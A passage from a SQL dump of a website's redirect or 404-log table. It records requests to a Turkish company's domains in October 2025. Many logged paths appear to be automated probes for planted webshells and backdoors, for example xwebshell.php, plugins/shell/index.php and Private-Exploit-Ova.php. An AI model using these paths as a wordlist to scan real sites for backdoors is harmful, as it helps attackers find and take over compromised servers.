00:00:00',301),(47797,'http://mail.3s-technologies.com.tr/tr/wj.php',NULL,'','',2,0,'2025-10-09 20:05:46','0000-00-00 00:00:00',301),(47798,'http://mail.3s-technologies.com.tr/tr/wk.php',NULL,'','',2,0,'2025-10-09 20:05:46','0000-00-00 00:00:00',301),(47799,'https://3s-technologies.com.tr/tr/images/4nooa4ej/production/a7d739b2c14f6b8bf3e7c76e1907929a446d613d-1920x1080.svg',NULL,'https://3s-technologies.com.tr/images/4nooa4ej/production/a7d739b2c14f6b8bf3e7c76e1907929a446d613d-1920x1080.svg','',2,0,'2025-10-09 22:40:51','0000-00-00 00:00:00',301),(47800,'http://3s-technologies.com.tr/tr/opop.php',NULL,'','',3,0,'2025-10-10 03:05:57','0000-00-00 00:00:00',301),(47801,'http://3s-technologies.com.tr/tr/snus.php',NULL,'','',14,0,'2025-10-10 03:06:01','0000-00-00 00:00:00',301),(47802,'http://3s-technologies.com.tr/tr/nfmr.php',NULL,'','',3,0,'2025-10-10 03:06:04','0000-00-00 00:00:00',301),(47803,'http://3s-technologies.com.tr/tr/gof.php',NULL,'','',3,0,'2025-10-10 03:06:06','0000-00-00 00:00:00',301),(47804,'http://3s-technologies.com.tr/tr/jsp.php',NULL,'','',3,0,'2025-10-10 03:06:07','0000-00-00 00:00:00',301),(47805,'http://3s-technologies.com.tr/tr/wa.php',NULL,'','',13,0,'2025-10-10 03:09:05','0000-00-00 00:00:00',301),(47806,'http://3s-technologies.com.tr/tr/wc.php',NULL,'','',3,0,'2025-10-10 03:09:07','0000-00-00 00:00:00',301),(47807,'http://3s-technologies.com.tr/tr/wd.php',NULL,'','',3,0,'2025-10-10 03:09:08','0000-00-00 00:00:00',301),(47808,'http://3s-technologies.com.tr/tr/wf.php',NULL,'','',5,0,'2025-10-10 03:09:10','0000-00-00 00:00:00',301),(47809,'http://3s-technologies.com.tr/tr/wg.php',NULL,'','',3,0,'2025-10-10 03:09:11','0000-00-00 00:00:00',301),(47810,'http://3s-technologies.com.tr/tr/wh.php',NULL,'','',4,0,'2025-10-10 03:09:13','0000-00-00 00:00:00',301),(47811,'http://3s-technologies.com.tr/tr/wj.php',NULL,'','',3,0,'2025-10-10 03:09:15','0000-00-00 00:00:00',301),(47812,'http://3s-technologies.com.tr/tr/wk.php',NULL,'','',3,0,'2025-10-10 03:09:16','0000-00-00 00:00:00',301),(47813,'http://mail.3s-technologies.com.tr/tr/2024',NULL,'http://mail.3s-technologies.com.tr/2024/','',9,0,'2025-10-10 16:53:20','0000-00-00 00:00:00',301),(47814,'http://mail.3s-technologies.com.tr/tr/site1',NULL,'http://mail.3s-technologies.com.tr/site1/','',9,0,'2025-10-10 16:53:21','0000-00-00 00:00:00',301),(47815,'http://mail.3s-technologies.com.tr/tr/fr',NULL,'http://mail.3s-technologies.com.tr/fr/','',9,0,'2025-10-10 16:53:22','0000-00-00 00:00:00',301),(47816,'http://mail.3s-technologies.com.tr/tr/website',NULL,'http://mail.3s-technologies.com.tr/website/','',9,0,'2025-10-10 16:53:24','0000-00-00 00:00:00',301),(47817,'http://mail.3s-technologies.com.tr/tr/store',NULL,'http://mail.3s-technologies.com.tr/store/','',9,0,'2025-10-10 16:53:25','0000-00-00 00:00:00',301),(47818,'http://mail.3s-technologies.com.tr/tr/press',NULL,'http://mail.3s-technologies.com.tr/press/','',9,0,'2025-10-10 16:53:26','0000-00-00 00:00:00',301),(47819,'http://mail.3s-technologies.com.tr/tr/de',NULL,'http://mail.3s-technologies.com.tr/de/','',9,0,'2025-10-10 16:53:32','0000-00-00 00:00:00',301),(47820,'http://mail.3s-technologies.com.tr/tr/portal',NULL,'http://mail.3s-technologies.com.tr/portal/','',9,0,'2025-10-10 16:53:34','0000-00-00 00:00:00',301),(47821,'http://mail.3s-technologies.com.tr/tr/us',NULL,'http://mail.3s-technologies.com.tr/us/','',9,0,'2025-10-10 16:53:35','0000-00-00 00:00:00',301),(47822,'http://mail.3s-technologies.com.tr/tr/blog2',NULL,'http://mail.3s-technologies.com.tr/blog2/','',9,0,'2025-10-10 16:53:37','0000-00-00 00:00:00',301),(47823,'http://mail.3s-technologies.com.tr/tr/content',NULL,'http://mail.3s-technologies.com.tr/content/','',9,0,'2025-10-10 16:53:38','0000-00-00 00:00:00',301),(47824,'http://mail.3s-technologies.com.tr/tr/2023',NULL,'http://mail.3s-technologies.com.tr/2023/','',9,0,'2025-10-10 16:53:40','0000-00-00 00:00:00',301),(47825,'http://3s-technologies.com.tr/tr/press',NULL,'http://3s-technologies.com.tr/press/','',8,0,'2025-10-10 21:08:51','0000-00-00 00:00:00',301),(47826,'http://3s-technologies.com.tr/tr/us',NULL,'http://3s-technologies.com.tr/us/','',8,0,'2025-10-10 21:08:51','0000-00-00 00:00:00',301),(47827,'http://3s-technologies.com.tr/tr/site1',NULL,'http://3s-technologies.com.tr/site1/','',8,0,'2025-10-10 21:08:55','0000-00-00 00:00:00',301),(47828,'http://3s-technologies.com.tr/tr/store',NULL,'http://3s-technologies.com.tr/store/','',8,0,'2025-10-10 21:08:58','0000-00-00 00:00:00',301),(47829,'http://3s-technologies.com.tr/tr/fr',NULL,'http://3s-technologies.com.tr/fr/','',8,0,'2025-10-10 21:08:59','0000-00-00 00:00:00',301),(47830,'http://3s-technologies.com.tr/tr/de',NULL,'http://3s-technologies.com.tr/de/','',8,0,'2025-10-10 21:09:07','0000-00-00 00:00:00',301),(47831,'http://www.3s-technologies.com.tr/tr/press',NULL,'http://www.3s-technologies.com.tr/press/','',10,0,'2025-10-10 21:45:03','0000-00-00 00:00:00',301),(47832,'http://www.3s-technologies.com.tr/tr/content',NULL,'http://www.3s-technologies.com.tr/content/','',10,0,'2025-10-10 21:45:13','0000-00-00 00:00:00',301),(47833,'http://www.3s-technologies.com.tr/tr/site1',NULL,'http://www.3s-technologies.com.tr/site1/','',10,0,'2025-10-10 21:45:14','0000-00-00 00:00:00',301),(47834,'http://www.3s-technologies.com.tr/tr/2024',NULL,'http://www.3s-technologies.com.tr/2024/','',10,0,'2025-10-10 21:45:15','0000-00-00 00:00:00',301),(47835,'http://www.3s-technologies.com.tr/tr/store',NULL,'http://www.3s-technologies.com.tr/store/','',10,0,'2025-10-10 21:45:16','0000-00-00 00:00:00',301),(47836,'http://www.3s-technologies.com.tr/tr/fr',NULL,'http://www.3s-technologies.com.tr/fr/','',10,0,'2025-10-10 21:45:22','0000-00-00 00:00:00',301),(47837,'http://www.3s-technologies.com.tr/tr/2023',NULL,'http://www.3s-technologies.com.tr/2023/','',10,0,'2025-10-10 21:45:23','0000-00-00 00:00:00',301),(47838,'http://www.3s-technologies.com.tr/tr/de',NULL,'http://www.3s-technologies.com.tr/de/','',10,0,'2025-10-10 21:45:24','0000-00-00 00:00:00',301),(47839,'http://www.3s-technologies.com.tr/tr/us',NULL,'http://www.3s-technologies.com.tr/us/','',10,0,'2025-10-10 21:45:25','0000-00-00 00:00:00',301),(47840,'http://3s-technologies.com.tr/tr/wp-slie.php',NULL,'http://3s-technologies.com.tr/wp-slie.php','',1,0,'2025-10-11 06:15:12','0000-00-00 00:00:00',301),(47841,'http://3s-technologies.com.tr/tr/wp-onta.php',NULL,'http://3s-technologies.com.tr/wp-onta.php','',1,0,'2025-10-11 06:15:19','0000-00-00 00:00:00',301),(47842,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/default.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/erinyani/default.php','',3,0,'2025-10-11 06:16:11','0000-00-00 00:00:00',301),(47843,'http://3s-technologies.com.tr/tr/wp-onto.php',NULL,'http://3s-technologies.com.tr/wp-onto.php','',1,0,'2025-10-11 06:16:14','0000-00-00 00:00:00',301),(47844,'http://3s-technologies.com.tr/tr/wp-content/plugins/mainhosting/asasx.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/mainhosting/asasx.php','',1,0,'2025-10-11 06:16:43','0000-00-00 00:00:00',301),(47845,'http://3s-technologies.com.tr/tr/wp-seto.php',NULL,'http://3s-technologies.com.tr/wp-seto.php','',1,0,'2025-10-11 06:16:54','0000-00-00 00:00:00',301),(47846,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/shell/index.php','',3,0,'2025-10-11 06:17:01','0000-00-00 00:00:00',301),(47847,'http://3s-technologies.com.tr/tr/private-exploit-ova.php',NULL,'http://3s-technologies.com.tr/Private-Exploit-Ova.php','',2,0,'2025-10-11 06:17:22','0000-00-00 00:00:00',301),(47848,'http://3s-technologies.com.tr/tr/private/index.php',NULL,'http://3s-technologies.com.tr/private/index.php','',2,0,'2025-10-11 06:17:23','0000-00-00 00:00:00',301),(47849,'http://3s-technologies.com.tr/tr/wp-koseko.php',NULL,'http://3s-technologies.com.tr/wp-koseko.php','',1,0,'2025-10-11 06:17:24','0000-00-00 00:00:00',301),(47850,'http://3s-technologies.com.tr/tr/fie.php',NULL,'http://3s-technologies.com.tr/fie.php','',2,0,'2025-10-11 06:17:32','0000-00-00 00:00:00',301),(47851,'http://3s-technologies.com.tr/tr/wp-content/plugins/tolly-t/hello.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/tolly-t/hello.php','',2,0,'2025-10-11 06:17:42','0000-00-00 00:00:00',301),(47852,'http://3s-technologies.com.tr/tr/wp-ori.php',NULL,'http://3s-technologies.com.tr/wp-ori.php','',1,0,'2025-10-11 06:17:56','0000-00-00 00:00:00',301),(47853,'http://3s-technologies.com.tr/tr/wp-ostro.php',NULL,'http://3s-technologies.com.tr/wp-ostro.php','',1,0,'2025-10-11 06:17:59','0000-00-00 00:00:00',301),(47854,'http://3s-technologies.com.tr/tr/ajax/xulp.php',NULL,'http://3s-technologies.com.tr/ajax/xulp.php','',1,0,'2025-10-11 06:18:04','0000-00-00 00:00:00',301),(47855,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/baxa1.php7',NULL,'http://3s-technologies.com.tr/wp-content/plugins/erinyani/baxa1.php7','',1,0,'2025-10-11 06:18:11','0000-00-00 00:00:00',301),(47856,'http://3s-technologies.com.tr/tr/xbrain.php',NULL,'http://3s-technologies.com.tr/xBrain.php','',4,0,'2025-10-11 06:18:29','0000-00-00 00:00:00',301),(47857,'http://3s-technologies.com.tr/tr/qfunctions.php',NULL,'http://3s-technologies.com.tr/qfunctions.php','',3,0,'2025-10-11 06:18:47','0000-00-00 00:00:00',301),(47858,'http://3s-technologies.com.tr/tr/wp-esp.php',NULL,'http://3s-technologies.com.tr/wp-esp.php','',1,0,'2025-10-11 06:18:48','0000-00-00 00:00:00',301),(47859,'http://3s-technologies.com.tr/tr/wp-seno.php',NULL,'http://3s-technologies.com.tr/wp-seno.php','',1,0,'2025-10-11 06:18:49','0000-00-00 00:00:00',301),(47860,'http://3s-technologies.com.tr/tr/wp-resso.php',NULL,'http://3s-technologies.com.tr/wp-resso.php','',1,0,'2025-10-11 06:19:15','0000-00-00 00:00:00',301),(47861,'http://3s-technologies.com.tr/tr/wp-oteso.php',NULL,'http://3s-technologies.com.tr/wp-oteso.php','',1,0,'2025-10-11 06:19:19','0000-00-00 00:00:00',301),(47862,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/includes/class-wp-filesystem-base.php',NULL,'http://3s-technologies.com.tr/wordpress/wp-admin/includes/class-wp-filesystem-base.php','',1,0,'2025-10-11 06:19:23','0000-00-00 00:00:00',301),(47863,'http://3s-technologies.com.tr/tr/wp-configss1.php',NULL,'http://3s-technologies.com.tr/wp-configss1.php','',3,0,'2025-10-11 06:19:25','0000-00-00 00:00:00',301),(47864,'http://3s-technologies.com.tr/tr/wp-xiomi.php',NULL,'http://3s-technologies.com.tr/wp-xiomi.php','',1,0,'2025-10-11 06:19:30','0000-00-00 00:00:00',301),(47865,'http://3s-technologies.com.tr/tr/private-expl0it.php',NULL,'http://3s-technologies.com.tr/Private-Expl0it.php','',1,0,'2025-10-11 06:19:33','0000-00-00 00:00:00',301),(47866,'http://3s-technologies.com.tr/tr/update/function.php',NULL,'http://3s-technologies.com.tr/update/function.php','',3,0,'2025-10-11 06:19:50','0000-00-00 00:00:00',301),(47867,'http://3s-technologies.com.tr/tr/wp-ampif.php',NULL,'http://3s-technologies.com.tr/wp-ampif.php','',1,0,'2025-10-11 06:19:52','0000-00-00 00:00:00',301),(47868,'http://3s-technologies.com.tr/tr/wp-content/plugins/secure-fortress/avdb_3f7a1921c1e2b.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/secure-fortress/avdb_3f7a1921c1e2b.php','',1,0,'2025-10-11 06:20:10','0000-00-00 00:00:00',301),(47869,'http://3s-technologies.com.tr/tr/wp-sit.php',NULL,'http://3s-technologies.com.tr/wp-sit.php','',1,0,'2025-10-11 06:20:14','0000-00-00 00:00:00',301),(47870,'http://3s-technologies.com.tr/tr/fm.php/sts.php',NULL,'http://3s-technologies.com.tr/fm.php/sts.php','',4,0,'2025-10-11 06:20:34','0000-00-00 00:00:00',301),(47871,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/as.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fix/as.php','',2,0,'2025-10-11 06:20:49','0000-00-00 00:00:00',301),(47872,'http://3s-technologies.com.tr/tr/wp-network.php.php',NULL,'http://3s-technologies.com.tr/wp-network.php.php','',2,0,'2025-10-11 06:20:53','0000-00-00 00:00:00',301),(47873,'http://3s-technologies.com.tr/tr/wordpress/bypassbest.php',NULL,'http://3s-technologies.com.tr/wordpress/BypassBest.php','',2,0,'2025-10-11 06:21:05','0000-00-00 00:00:00',301),(47874,'http://3s-technologies.com.tr/tr/not.php',NULL,'http://3s-technologies.com.tr/not.php','',1,0,'2025-10-11 06:21:06','0000-00-00 00:00:00',301),(47875,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/settings.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfour/settings.php','',1,0,'2025-10-11 06:21:09','0000-00-00 00:00:00',301),(47876,'http://3s-technologies.com.tr/tr/wp-content/plugins/mainhosting/default.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/mainhosting/default.php','',4,0,'2025-10-11 06:21:10','0000-00-00 00:00:00',301),(47877,'http://3s-technologies.com.tr/tr/accah.php',NULL,'http://3s-technologies.com.tr/accah.php','',1,0,'2025-10-11 06:21:14','0000-00-00 00:00:00',301),(47878,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/j.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/pridmag/j.php','',1,0,'2025-10-11 06:21:21','0000-00-00 00:00:00',301),(47879,'http://3s-technologies.com.tr/tr/wp-sose.php',NULL,'http://3s-technologies.com.tr/wp-sose.php','',1,0,'2025-10-11 06:21:26','0000-00-00 00:00:00',301),(47880,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/tolly-t/hello.php',NULL,'http://3s-technologies.com.tr/wordpress/wp-content/plugins/tolly-t/hello.php','',2,0,'2025-10-11 06:21:32','0000-00-00 00:00:00',301),(47881,'http://3s-technologies.com.tr/tr/fm.php/inputs.php',NULL,'http://3s-technologies.com.tr/fm.php/inputs.php','',1,0,'2025-10-11 06:21:42','0000-00-00 00:00:00',301),(47882,'http://3s-technologies.com.tr/tr/swa.php',NULL,'http://3s-technologies.com.tr/swa.php','',1,0,'2025-10-11 06:21:44','0000-00-00 00:00:00',301),(47883,'http://3s-technologies.com.tr/tr/assets/images/xulp.php',NULL,'http://3s-technologies.com.tr/assets/images/xulp.php','',1,0,'2025-10-11 06:22:03','0000-00-00 00:00:00',301),(47884,'http://3s-technologies.com.tr/tr/wp-content/plugins/smile/nfiav.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/smile/nfiav.php','',1,0,'2025-10-11 06:22:11','0000-00-00 00:00:00',301),(47885,'http://3s-technologies.com.tr/tr/wp-content/plugins/mainhosting/past.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/mainhosting/past.php','',1,0,'2025-10-11 06:22:12','0000-00-00 00:00:00',301),(47886,'http://3s-technologies.com.tr/tr/wp-admin/rcc.php',NULL,'http://3s-technologies.com.tr/wp-admin/rcc.php','',1,0,'2025-10-11 06:22:34','0000-00-00 00:00:00',301),(47887,'http://3s-technologies.com.tr/tr/wp-admin/admin-wolf.php',NULL,'http://3s-technologies.com.tr/wp-admin/admin-wolf.php','',4,0,'2025-10-11 06:23:02','0000-00-00 00:00:00',301),(47888,'http://3s-technologies.com.tr/tr/update/nfiav.php',NULL,'http://3s-technologies.com.tr/update/nfiav.php','',1,0,'2025-10-11 06:23:04','0000-00-00 00:00:00',301),(47889,'http://3s-technologies.com.tr/tr/system.php.php',NULL,'http://3s-technologies.com.tr/system.php.php','',1,0,'2025-10-11 06:23:10','0000-00-00 00:00:00',301),(47890,'http://3s-technologies.com.tr/tr/copypaths.php',NULL,'http://3s-technologies.com.tr/copypaths.php','',5,0,'2025-10-11 06:23:33','0000-00-00 00:00:00',301),(47891,'http://3s-technologies.com.tr/tr/wp-hfjd.php',NULL,'http://3s-technologies.com.tr/wp-hfjd.php','',1,0,'2025-10-11 06:23:35','0000-00-00 00:00:00',301),(47892,'http://3s-technologies.com.tr/tr/oxvrws.php',NULL,'http://3s-technologies.com.tr/oxvrws.php','',3,0,'2025-10-11 06:23:37','0000-00-00 00:00:00',301),(47893,'http://3s-technologies.com.tr/tr/enki.php',NULL,'http://3s-technologies.com.tr/ENKI.php','',2,0,'2025-10-11 06:24:07','0000-00-00 00:00:00',301),(47894,'http://3s-technologies.com.tr/tr/zasf',NULL,'http://3s-technologies.com.tr/zasf','',3,0,'2025-10-11 06:24:08','0000-00-00 00:00:00',301),(47895,'http://3s-technologies.com.tr/tr/xwebshell.php',NULL,'http://3s-technologies.com.tr/xwebshell.php','',3,0,'2025-10-11 06:24:09','0000-00-00 00:00:00',301),(47896,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/404.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/pridmag/404.php','',2,0,'2025-10-11 06:24:17','0000-00-00 00:00:00',301),(47897,'http://3s-technologies.com.tr/tr/wp-trocs.php',NULL,'http://3s-technologies.com.tr/wp-trocs.php','',1,0,'2025-10-11 06:24:19','0000-00-00 00:00:00',301),(47898,'http://3s-technologies.com.tr/tr/arrhfzkmvg/pmnxiarges.php',NULL,'http://3s-technologies.com.tr/arrhfzkmvg/pmnxiarges.php','',1,0,'2025-10-11 06:24:25','0000-00-00 00:00:00',301),(47899,'http://3s-technologies.com.tr/tr/ajax/xl2024.php',NULL,'http://3s-technologies.com.tr/ajax/xl2024.php','',2,0,'2025-10-11 06:24:53','0000-00-00 00:00:00',301),(47900,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/x.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fix/x.php','',2,0,'2025-10-11 06:25:07','0000-00-00 00:00:00',301),(47901,'http://3s-technologies.com.tr/tr/wp-radiot.php',NULL,'http://3s-technologies.com.tr/wp-radiot.php','',1,0,'2025-10-11 06:25:16','0000-00-00 00:00:00',301),(47902,'http://3s-technologies.com.tr/tr/.well-known/rcc.php',NULL,'http://3s-technologies.com.tr/.well-known/rcc.php','',1,0,'2025-10-11 06:25:32','0000-00-00 00:00:00',301),(47903,'http://3s-technologies.com.tr/tr/.well-known/.qiodetme.php',NULL,'http://3s-technologies.com.tr/.well-known/.qiodetme.php','',2,0,'2025-10-11 06:25:33','0000-00-00 00:00:00',301),(47904,'http://3s-technologies.com.tr/tr/wp-tot.php',NULL,'http://3s-technologies.com.tr/wp-tot.php','',10,0,'2025-10-11 06:25:39','0000-00-00 00:00:00',301),(47905,'http://3s-technologies.com.tr/tr/wp-admin/bu4.php',NULL,'http://3s-technologies.com.tr/wp-admin/bu4.php','',2,0,'2025-10-11 06:26:06','0000-00-00 00:00:00',301),(47906,'http://3s-technologies.com.tr/tr/wp-content/hehe.php',NULL,'http://3s-technologies.com.tr/wp-content/hehe.php','',2,0,'2025-10-11 06:26:35','0000-00-00 00:00:00',301),(47907,'http://3s-technologies.com.tr/tr/wp-amp.php',NULL,'http://3s-technologies.com.tr/wp-amp.php','',1,0,'2025-10-11 06:27:13','0000-00-00 00:00:00',301),(47908,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/zx.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fix/zx.php','',1,0,'2025-10-11 06:27:18','0000-00-00 00:00:00',301),(47909,'http://3s-technologies.com.tr/tr/ajk.php',NULL,'http://3s-technologies.com.tr/ajk.php','',2,0,'2025-10-11 06:27:26','0000-00-00 00:00:00',301),(47910,'http://3s-technologies.com.tr/tr/update/g.php',NULL,'http://3s-technologies.com.tr/update/g.php','',4,0,'2025-10-11 06:27:30','0000-00-00 00:00:00',301),(47911,'http://3s-technologies.com.tr/tr/ja.php',NULL,'http://3s-technologies.com.tr/ja.php','',2,0,'2025-10-11 06:27:39','0000-00-00 00:00:00',301),(47912,'http://3s-technologies.com.tr/tr/wp-content/themes/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/classwithtostring.php','',3,0,'2025-10-11 06:27:42','0000-00-00 00:00:00',301),(47913,'http://3s-technologies.com.tr/tr/wp-admin/maint/file.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/file.php','',2,0,'2025-10-11 06:28:17','0000-00-00 00:00:00',301),(47914,'http://3s-technologies.com.tr/tr/zxl.php',NULL,'','',23,0,'2025-10-11 14:08:51','0000-00-00 00:00:00',301),(47915,'http://3s-technologies.com.tr/tr/gdn.php',NULL,'','',47,0,'2025-10-11 14:08:52','0000-00-00 00:00:00',301),(47916,'http://3s-technologies.com.tr/tr/132.php',NULL,'','',2,0,'2025-10-11 14:10:23','0000-00-00 00:00:00',301),(47917,'http://3s-technologies.com.tr/tr/321.php',NULL,'','',8,0,'2025-10-11 14:10:24','0000-00-00 00:00:00',301),(47918,'http://3s-technologies.com.tr/tr/x2a.php56',NULL,'','',2,0,'2025-10-11 14:10:29','0000-00-00 00:00:00',301),(47919,'http://mail.3s-technologies.com.tr/tr/wp-admin/chosen.php',NULL,'','',17,0,'2025-10-12 05:21:08','0000-00-00 00:00:00',301),(47920,'http://mail.3s-technologies.com.tr/tr/function/admin.php',NULL,'','',1,0,'2025-10-12 05:21:09','0000-00-00 00:00:00',301),(47921,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/ty.php',NULL,'','',1,0,'2025-10-12 05:21:09','0000-00-00 00:00:00',301),(47922,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/atomlib.php',NULL,'','',3,0,'2025-10-12 05:21:10','0000-00-00 00:00:00',301),(47923,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/index.php',NULL,'','',12,0,'2025-10-12 05:21:11','0000-00-00 00:00:00',301),(47924,'http://mail.3s-technologies.com.tr/tr/uploads/admin.php',NULL,'','',1,0,'2025-10-12 05:21:11','0000-00-00 00:00:00',301),(47925,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/codemirror/index.php',NULL,'','',30,0,'2025-10-12 05:21:12','0000-00-00 00:00:00',301),(47926,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/about.php',NULL,'','',36,0,'2025-10-12 05:21:13','0000-00-00 00:00:00',301),(47927,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-supports/about.php',NULL,'','',2,0,'2025-10-12 05:21:14','0000-00-00 00:00:00',301),(47928,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/index.php',NULL,'','',2,0,'2025-10-12 05:21:14','0000-00-00 00:00:00',301),(47929,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/file.php',NULL,'','',2,0,'2025-10-12 05:21:15','0000-00-00 00:00:00',301),(47930,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/getid3s.php',NULL,'','',1,0,'2025-10-12 05:21:18','0000-00-00 00:00:00',301),(47931,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/makeasmtp.php',NULL,'','',1,0,'2025-10-12 05:21:18','0000-00-00 00:00:00',301),(47932,'http://mail.3s-technologies.com.tr/tr/about/function.php',NULL,'','',41,0,'2025-10-12 05:21:19','0000-00-00 00:00:00',301),(47933,'http://mail.3s-technologies.com.tr/tr/system.php',NULL,'','',28,0,'2025-10-12 05:21:20','0000-00-00 00:00:00',301),(47934,'http://mail.3s-technologies.com.tr/tr/wp-admin/log.php',NULL,'','',4,0,'2025-10-12 05:21:21','0000-00-00 00:00:00',301),(47935,'http://mail.3s-technologies.com.tr/tr/media.php',NULL,'','',11,0,'2025-10-12 05:21:22','0000-00-00 00:00:00',301),(47936,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/about.php7',NULL,'','',2,0,'2025-10-12 05:21:22','0000-00-00 00:00:00',301),(47937,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/admin.php',NULL,'','',15,0,'2025-10-12 05:21:23','0000-00-00 00:00:00',301),(47938,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/filemanager.php',NULL,'','',10,0,'2025-10-12 05:21:24','0000-00-00 00:00:00',301),(47939,'http://mail.3s-technologies.com.tr/tr/menu.php',NULL,'','',35,0,'2025-10-12 05:21:24','0000-00-00 00:00:00',301),(47940,'http://mail.3s-technologies.com.tr/tr/wp-includes/style-engine/index.php',NULL,'','',18,0,'2025-10-12 05:21:25','0000-00-00 00:00:00',301),(47941,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/wp-conflg.php',NULL,'','',12,0,'2025-10-12 05:21:27','0000-00-00 00:00:00',301),(47942,'http://mail.3s-technologies.com.tr/tr/.well-known/log.php',NULL,'','',20,0,'2025-10-12 05:21:29','0000-00-00 00:00:00',301),(47943,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-patterns/about.php',NULL,'','',1,0,'2025-10-12 05:21:31','0000-00-00 00:00:00',301),(47944,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/admin.php',NULL,'','',8,0,'2025-10-12 05:21:31','0000-00-00 00:00:00',301),(47945,'http://mail.3s-technologies.com.tr/tr/goat1.php',NULL,'','',9,0,'2025-10-12 05:21:32','0000-00-00 00:00:00',301),(47946,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/wp-conflg.php',NULL,'','',1,0,'2025-10-12 05:21:33','0000-00-00 00:00:00',301),(47947,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/about.php',NULL,'','',2,0,'2025-10-12 05:21:33','0000-00-00 00:00:00',301),(47948,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/wp-login.php',NULL,'','',5,0,'2025-10-12 05:21:34','0000-00-00 00:00:00',301),(47949,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-help/index.php',NULL,'','',1,0,'2025-10-12 05:21:35','0000-00-00 00:00:00',301),(47950,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/about.php',NULL,'','',1,0,'2025-10-12 05:21:35','0000-00-00 00:00:00',301),(47951,'http://mail.3s-technologies.com.tr/tr/wp-admin/classwithtostring.php',NULL,'','',1,0,'2025-10-12 05:21:37','0000-00-00 00:00:00',301),(47952,'http://mail.3s-technologies.com.tr/tr/wp-content/themes.php',NULL,'','',1,0,'2025-10-12 05:21:38','0000-00-00 00:00:00',301),(47953,'http://mail.3s-technologies.com.tr/tr/wp-admin/function.php',NULL,'','',13,0,'2025-10-12 05:21:38','0000-00-00 00:00:00',301),(47954,'http://mail.3s-technologies.com.tr/tr/filemanager.php',NULL,'','',20,0,'2025-10-12 05:21:39','0000-00-00 00:00:00',301),(47955,'http://mail.3s-technologies.com.tr/tr/wp-includes/manager.php',NULL,'','',1,0,'2025-10-12 05:21:40','0000-00-00 00:00:00',301),(47956,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-patterns/index.php',NULL,'','',21,0,'2025-10-12 05:21:41','0000-00-00 00:00:00',301),(47957,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/wp-login.php',NULL,'','',1,0,'2025-10-12 05:21:41','0000-00-00 00:00:00',301),(47958,'http://mail.3s-technologies.com.tr/tr/images/about.php',NULL,'','',1,0,'2025-10-12 05:21:42','0000-00-00 00:00:00',301),(47959,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/about.php',NULL,'','',2,0,'2025-10-12 05:21:43','0000-00-00 00:00:00',301),(47960,'http://mail.3s-technologies.com.tr/tr/admin/admin.php',NULL,'','',4,0,'2025-10-12 05:21:44','0000-00-00 00:00:00',301),(47961,'http://mail.3s-technologies.com.tr/tr/plugins.php',NULL,'','',24,0,'2025-10-12 05:21:46','0000-00-00 00:00:00',301),(47962,'http://mail.3s-technologies.com.tr/tr/function/function.php',NULL,'','',13,0,'2025-10-12 05:21:47','0000-00-00 00:00:00',301),(47963,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/index.php',NULL,'','',9,0,'2025-10-12 05:21:49','0000-00-00 00:00:00',301),(47964,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/wp.php',NULL,'','',8,0,'2025-10-12 05:21:50','0000-00-00 00:00:00',301),(47965,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/index.php',NULL,'','',3,0,'2025-10-12 05:21:51','0000-00-00 00:00:00',301),(47966,'http://mail.3s-technologies.com.tr/tr/as/function.php',NULL,'','',4,0,'2025-10-12 05:21:52','0000-00-00 00:00:00',301),(47967,'http://mail.3s-technologies.com.tr/tr/cc.php',NULL,'','',17,0,'2025-10-12 05:21:53','0000-00-00 00:00:00',301),(47968,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/wp-conflg.php',NULL,'','',30,0,'2025-10-12 05:21:54','0000-00-00 